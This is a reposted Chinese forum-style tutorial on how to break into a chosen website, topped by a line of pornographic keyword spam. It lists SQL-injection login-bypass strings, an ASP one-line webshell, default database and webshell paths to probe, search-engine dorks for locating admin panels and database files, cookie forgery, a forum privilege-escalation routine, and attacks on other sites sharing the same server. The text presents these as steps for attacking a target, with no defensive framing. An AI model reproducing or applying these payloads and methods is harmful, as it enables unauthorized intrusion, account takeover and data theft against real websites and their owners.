日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

关于入侵网站

發(fā)布時(shí)間:2023/12/18 编程问答 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 关于入侵网站 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

如何去攻擊一個(gè)網(wǎng)站?
首先,觀察指定網(wǎng)站。

入侵指定網(wǎng)站是需要條件的:
要先觀察這個(gè)網(wǎng)站是動(dòng)態(tài)還是靜態(tài)的。
首先介紹下什么樣站點(diǎn)可以入侵:我認(rèn)為必須是動(dòng)態(tài)的網(wǎng)站 如ASP、PHP、 JSP等代碼編寫的站點(diǎn)
如果是靜態(tài)的(.htm或html),一般是不會(huì)成功的。如果要入侵的目標(biāo)網(wǎng)站是動(dòng)態(tài)的,就可以利用動(dòng)態(tài)網(wǎng)站的漏洞進(jìn)行入侵。

Quote:
以下是入侵網(wǎng)站常用方法:
1.上傳漏洞
如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請(qǐng)登陸后使用”,80%就有漏洞了!
有時(shí)上傳不一定會(huì)成功,這是因?yàn)镃ookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳. 

2.注入漏洞
字符過濾不嚴(yán)造成的

3.暴庫:把二級(jí)目錄中間的/換成\ 
 
 
4.’or’=’or’這是一個(gè)可以連接SQL的語名句.可以直接進(jìn)入后臺(tái)。我收集了一下。類似的還有:
 ’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a  or 1=1--  ’ or ’a’=’a
5.社會(huì)工程學(xué)。這個(gè)我們都知道吧。就是猜解。
 
6.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬〈%execute request("value")%〉 (數(shù)據(jù)庫必需得是ASP或ASA的后綴)
  
7.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很懶.什么也不改.
比如:默認(rèn)數(shù)據(jù)庫,默認(rèn)后臺(tái)地址,默認(rèn)管理員帳號(hào)密碼等
   
8.默認(rèn)數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網(wǎng)站獵手 挖掘雞 明小子

9.查看目錄法:一些網(wǎng)站可以斷開目錄,可以訪問目錄。
210.37.95.65 images
10.工具溢出
      
11.搜索引擎利用:
 
(1).inurl:flasher_list.asp  默認(rèn)數(shù)據(jù)庫:database/flash.mdb  后臺(tái)/manager/
(2).找網(wǎng)站的管理后臺(tái)地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理  〈關(guān)鍵字很多,自已找〉
site:xxxx.cominurl:login
(3).查找access的數(shù)據(jù)庫,mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb

12.COOKIE詐騙:把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。

13.利用常見的漏洞:如動(dòng)網(wǎng)BBS
可以先用:dvbbs權(quán)限提升工具,使自已成為前臺(tái)管理員。
THEN,運(yùn)用:動(dòng)網(wǎng)固頂貼工具,找個(gè)固頂貼,再取得COOKIES,這個(gè)要你自已做。我們可以用WSockExpert取得Cookies/NC包
這個(gè)我就不做了,網(wǎng)上教程多的是,自已下個(gè)看看。
工具:dvbbs權(quán)限提升工具  動(dòng)網(wǎng)固頂貼工具
14.還有一些老漏洞。如IIS3,4的查看源碼,5的DELETE
  CGI,PHP的一些老洞,我就不說了啊。。太老了。沒有什么大用途。      
         一般入侵思路    
       腳本注入(ASP PHP JSP)
1.腳本漏洞   
       其它腳本漏洞(上傳漏洞,跨站漏洞等) 
        
         
      域名旁注   
2.旁注     
      “IP”旁注

      本地溢出
3.溢出漏洞 
      遠(yuǎn)程溢出

      ARP欺騙
4.網(wǎng)絡(luò)竊聽
      IP欺騙

5.社會(huì)工程學(xué)(社會(huì)工程其實(shí)是心理學(xué))
簡單的說,可以利用以上方法來入侵,如果這個(gè)指定網(wǎng)站的確沒有漏洞,還可以利用其它方式。。。

〓通往電腦的路不止一條〓
如果目標(biāo)網(wǎng)站程序沒有漏洞,可以按照以下方法:
首先判斷對(duì)方網(wǎng)站服務(wù)器主機(jī)的IP地址,比如:ping www.baidu.com,就可以得到百度網(wǎng)站的服務(wù)器IP地址,當(dāng)然也可以利用旁注等工具來查詢目標(biāo)網(wǎng)站服務(wù)器的IP地址。。。
可以試著入侵目標(biāo)網(wǎng)站所在的服務(wù)器,可以用旁注工具來查詢這個(gè)服務(wù)器上都放了多少個(gè)網(wǎng)站。。。
如果目標(biāo)網(wǎng)站沒有漏洞,可以試著入侵同服務(wù)器上的其它網(wǎng)站。。。如果能夠入侵同服務(wù)器上的其它網(wǎng)站,就可以獲得權(quán)限,看能不能夠提權(quán)拿到服務(wù)器等。
也可以直接入侵這臺(tái)網(wǎng)站的服務(wù)器!
比如:用IP端口掃描軟件,掃描一下目標(biāo)服務(wù)器都開放了哪些端口,然后利用開放的漏洞端口進(jìn)行入侵。常見漏洞端口如何入侵,已經(jīng)有很多這方面的資料了。還可以查詢目標(biāo)服務(wù)器有哪些漏洞,比如微軟最新Oday漏洞,利用漏洞拿到服務(wù)器權(quán)限。木馬入侵,讓網(wǎng)站主機(jī)感染你的木馬。主要是看目標(biāo)網(wǎng)站服務(wù)器系統(tǒng)是否存在漏洞。

轉(zhuǎn)載于:https://www.cnblogs.com/lyd123/p/10315009.html

總結(jié)

以上是生活随笔為你收集整理的关于入侵网站的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。